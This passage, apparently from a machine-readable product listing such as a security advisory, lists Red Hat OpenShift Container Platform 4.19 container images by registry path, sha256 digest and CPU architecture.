"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:cf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:d83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:dd57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:e0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:bf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:fe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:d0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:eb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:be277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:c5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:e3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:accb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:b508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:bd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:d1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:acebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:b654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:cff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:bce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:c28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:a252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:cb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:dd3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:c2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:e1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:cd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:e233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:ed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:b391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:a8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:fcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:eec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:fb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:b8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:be5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:df471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:b46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:ab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:cf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:bfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:c1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441_s390x",
